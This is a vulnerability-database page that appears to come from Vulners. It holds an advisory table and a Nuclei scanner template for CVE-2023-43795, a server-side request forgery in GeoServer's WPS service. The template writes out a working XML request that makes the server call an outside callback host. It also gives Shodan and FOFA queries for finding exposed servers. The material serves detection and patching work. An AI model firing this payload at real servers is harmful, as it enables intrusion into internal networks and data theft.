| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2023-43795 | 31 Jan 202500:00 | – | circl | |
| GeoServer 代码问题漏洞 | 25 Oct 202300:00 | – | cnnvd | |
| GeoServer server-side request forgery vulnerability (CNVD-2024-14588) | 30 Oct 202300:00 | – | cnvd | |
| CVE-2023-43795 | 24 Oct 202322:14 | – | cve | |
| CVE-2023-43795 WPS Server Side Request Forgery in GeoServer | 24 Oct 202322:14 | – | cvelist | |
| WPS Server Side Request Forgery vulnerability | 24 Oct 202319:21 | – | github | |
| CVE-2023-43795 | 25 Oct 202318:17 | – | nvd | |
| CVE-2023-43795 WPS Server Side Request Forgery in GeoServer | 24 Oct 202322:14 | – | osv | |
| GHSA-5PR3-M5HM-9956 WPS Server Side Request Forgery vulnerability | 24 Oct 202319:21 | – | osv | |
| Server side request forgery (ssrf) | 25 Oct 202318:17 | – | prion |
id: CVE-2023-43795
info:
name: GeoServer WPS - Server Side Request Forgery
author: DhiyaneshDK
severity: critical
description: |
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
impact: |
Unauthenticated attackers can exploit SSRF through the WPS service to make arbitrary HTTP requests and access internal network resources, potentially compromising the entire GeoServer infrastructure and accessing sensitive geospatial data.
remediation: |
Update GeoServer to version 2.22.5 or 2.23.2 or later that validates URLs in WPS requests and restricts access to authorized external resources only.
reference:
- https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
- https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
- https://nvd.nist.gov/vuln/detail/CVE-2023-43795
- https://github.com/20142995/sectool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43795
cwe-id: CWE-918
epss-score: 0.67715
epss-percentile: 0.99228
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: osgeo
product: geoserver
shodan-query:
- title:"GeoServer"
- http.title:"geoserver"
fofa-query:
- app="GeoServer"
- app="geoserver"
- title="geoserver"
google-query: intitle:"geoserver"
tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo,vkev,vuln
variables:
oast: "{{interactsh-url}}"
string: "{{to_lower(rand_text_alpha(4))}}"
value: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.opengis.net/wps/1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1"
xmlns:gml="http://www.opengis.net/gml"
xmlns:ogc="http://www.opengis.net/ogc"
xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
xmlns:xlink="http://www.w3.org/1999/xlink"
xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>JTS:area</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>geom</ows:Identifier>
<wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
<wps:Header key="{{string}}" value="{{value}}"/>
</wps:Reference>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput>
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
payloads:
path:
- /wms
- /geoserver/wms
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'http')
- contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
- status_code == 200
condition: and
# digest: 4b0a00483046022100ebccec1386c67a71b4045a062ade824a17d1fbab2aaef6215abbe6851ecf08bc0221009cd62dcd89816d1ae35fb5aaae6f255f22960f4bdcf34dcb3b128a8a4c0b69b1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation